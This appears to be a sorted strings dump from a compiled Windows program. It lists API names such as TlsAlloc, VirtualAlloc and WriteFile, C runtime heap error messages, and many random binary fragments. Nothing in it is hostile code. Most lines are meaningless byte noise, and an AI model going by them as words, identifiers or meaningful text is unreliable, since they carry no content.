TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t<,QQL
TranslateAcceleratorA
TranslateMessage
t"SS9]
t,.[TE
t$<"u	3
Tuesday
;t$,v-
t+WWVPV
UaeEW)
;Uj>\X_
	)u+Ky?[)
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
u%UC=0
u$WYCz
V5IM@M@}
vc.orod
&?vDy$ 
?`^&ve
|Ve$`b
VirtualAlloc
VirtualFree
v	N+D$
vrartM
VUFimr
 v(vtv
w)171C
^W,BYz
{W]Dj]
Wednesday
WideCharToMultiByte
	WR5!dB
WriteFile
wsprintfA
wtDDDDDDDC
Wt	j~^
W< tnmf
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
wwwwwwwwww
wwwwwwwwwwwww
wwwwwwwwwwwwww
wwwwwwwwwwwwwwz
wwwwwwwwwwwwwz
wwwwwwwwwwwwwzwwww
wwwwwwwwzww
wwwwwwwxx
wwwwwwwz
wwwwwwwzww
x0<3;t
xeagsB
xiE9k;'
xSXw<*
|~XWMi
X	'(xaMA
y#/3?s
yI0met
Yilcej
Y]L5PP
yof6]U
>=Yt1j
yTdae+de
y?"u2j
Y]UWK.
Z-0yKJ
zeeerF
^z&pKV
zyisS1